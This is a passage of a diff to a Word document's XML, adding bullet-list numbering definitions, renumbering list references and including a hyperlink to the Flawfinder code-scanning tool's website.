+          <w:t>https://dwheeler.com/flawfinder/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11130,6 +12402,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="44857242"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="40F0C4E2"/>
+    <w:lvl w:ilvl="0" w:tplc="04100001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="475D7349"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0B3E95AA"/>
@@ -11242,7 +12627,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="50AF21C0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6D8AABA4"/>
@@ -11331,7 +12716,120 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="58353E53"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="909C40F0"/>
+    <w:lvl w:ilvl="0" w:tplc="04100001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="64F60782"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6C4C38E0"/>
@@ -11444,7 +12942,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6E272112"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CEBA3B44"/>
@@ -11530,7 +13028,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="701A5D3C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="21CE4578"/>
@@ -11643,7 +13141,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="749C5B04"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E92E2160"/>
@@ -11756,7 +13254,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="75546138"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C406D0C0"/>
@@ -11849,10 +13347,10 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="6"/>
@@ -11870,19 +13368,19 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="9">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="11">
     <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="12">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="13">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="14">
     <w:abstractNumId w:val="5"/>
@@ -11891,7 +13389,13 @@
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="16">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="17">
     <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="18">
+    <w:abstractNumId w:val="12"/>
   </w:num>
 </w:numbering>
 </file>
